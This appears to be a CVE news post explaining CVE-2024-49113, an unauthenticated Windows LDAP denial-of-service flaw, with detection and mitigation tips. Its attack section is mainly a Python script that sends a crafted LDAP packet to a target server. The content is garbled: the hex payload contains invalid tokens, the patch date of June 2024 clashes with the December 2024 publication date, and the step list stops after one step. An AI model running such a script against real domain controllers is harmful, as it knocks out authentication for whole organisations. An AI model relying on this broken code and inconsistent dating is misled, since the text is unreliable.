CVE CyberSecurity Database News

CVE-2024-49113 - Windows LDAP Denial of Service Vulnerability Explained with Proof-of-Concept

Poster -

CVE-2024-49113 refers to a recently discovered vulnerability in Microsoft Windows’ Lightweight Directory Access Protocol (LDAP) implementation. An attacker can remotely cause a denial of service (DoS) to an affected Windows server by sending malformed LDAP requests. This DoS doesn’t require authentication, making it especially risky for organizations exposing LDAP services to internal networks or, worse, the internet.

Why Is This Vulnerability Important?

LDAP is a protocol used by Windows Domain Controllers for managing and authenticating directory information. If an attacker can crash LDAP, services that rely on user authentication and directory lookups can become non-functional. This can result in wide-scale outages, especially in environments heavily dependent on Windows Active Directory.

Patched by Microsoft in: June 2024 Patch Tuesday

Original advisory:
- Microsoft Security Update Guide: CVE-2024-49113

How Does the Exploit Work?

The vulnerability exists due to improper handling of malformed LDAP search requests. By crafting a special TCP packet containing a certain invalid LDAP filter, an attacker can cause the LDAP service to consume excessive resources or crash (denial of service).

Step-by-Step Attack Scenario

1. Locate exposed LDAP port (Default: 389/TCP for LDAP, 636/TCP for LDAPS)

Proof-of-Concept Code

Here is a simple Python script using the ldap3 library and socket to demonstrate the DoS condition. (USE ONLY IN TEST ENVIRONMENTS!)

import socket
import struct

def create_malformed_ldap_packet():
    # This is an invalid LDAP search request that triggers DoS
    # ASN.1 Prefix: x30 = SEQUENCE, x81 = long len, x99 = 153 bytes (example)
    # This is just a demo PoC and may need tuning for your target version
    return bytes.fromhex(
        "30 84 00 00 00 45 02 01 01 63 84 00 00 00 38 04 00" +
        "a 01 00 a 01 00 02 01 00 02 01 00 01 01 00 a 84" +
        "00 00 00 17 a3 84 00 00 00 10 04 00 04 00 02 01 01" +
        "87 b 6d 61 6c 66 6f 72 6d 65 64 66 69 6c 74 65 72" # malformed part
    )

def send_payload(host, port):
    s = socket.socket()
    s.connect((host, port))
    pkt = create_malformed_ldap_packet()
    s.send(pkt)
    s.close()
    print(f"Sent payload to {host}:{port}")

# CHANGE THIS TO YOUR LAB TARGET
target_host = "192.168.1.100"
ldap_port = 389

send_payload(target_host, ldap_port)

How it works:
This script crafts and sends a specially malformed packet to the target LDAP port, instantly causing the service to crash or hang.

Real-World Impacts

- Domain Controllers: If these hang, Kerberos/NTLM logins and LDAP directory queries fail.

How to Detect Exploitation Attempts

- Event Logs: Look in the Windows Event Viewer for LDAP service crashes or resource exhaustion events around the time of abnormal input.
- Unusual Network Traffic: IDS/IPS can alert on malformed LDAP ASN.1 sequences.

Restrict LDAP Access: Limit LDAP port exposure to trusted networks only.

- Layer 7 Protection: Employ WAF/IPS signatures to detect malformed LDAP packets.

References & Further Reading

- Microsoft Security Update Guide
- LDAP Security Best Practices
- NIST NVD Entry for CVE-2024-49113

Final Thoughts

CVE-2024-49113 underlines how critical LDAP is for Windows ecosystem security. Always patch Directory Services quickly and monitor for abnormal traffic patterns. Don't expose LDAP to the internet. Test this vulnerability only on your lab, and never attack production or unauthorized systems.

Timeline

Published on: 12/12/2024 02:04:37 UTC
Last modified on: 12/20/2024 07:44:56 UTC